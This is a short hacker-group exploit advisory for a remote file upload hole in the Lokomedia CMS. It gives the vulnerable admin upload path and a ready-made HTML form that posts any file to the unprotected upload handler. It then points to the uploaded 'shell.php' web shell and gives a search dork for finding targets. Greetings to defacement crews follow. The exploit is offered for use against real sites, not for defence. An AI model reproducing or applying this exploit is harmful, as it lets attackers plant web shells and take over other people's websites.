[!]===========================================================================[!]
[~] CMS Lokomedia Remote File Upload Vulnerability
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://r0b0t.us | http://mc-crew.info
[~] Date : 04 Juni, 20101
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://bukulokomedia.com/home
[+] Price : free
[+] Vulnerability : RFU
[+] Dork : "r0b0t.us" ;)
[+] Version : all version
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1/path/content.php?act=tambahupload[RFU]
[ XpL ]
http://127.0.0.1/pathadmin/content.php?act=tambahupload
<h2>Tambah Upload</h2>
<form enctype=multipart/form-data method=post action='http://site.com/pathadmin/aksi.php?module=upload&act=input'>
File yang diupload : <input type=file name=fupload><br>
Deskripsi File : <br><textarea name=deskripsi rows=8 cols=40></textarea><br>
<input type=submit value=Upload>
</form>
[ d3m0 ]
http://127.0.0.1/pathadmin/content.php?act=tambahupload
http://xxxxxx.com/@dm1n1strat0rPag3/content.php?act=tambahupload
You Can see Shel in this path
http://xxxxxx.com/patadmin/files/shell.php
etc etc etc ;]
[!]===========================================================================[!]
[ Thx TO ]
[+] Don Tukulesto Cungkring...
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot,kaMtiEz, El-farhatz
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212
[ NOTE ]
[+] For My Girl, I don't Forget it ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">
[ QUOTE ]
[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community
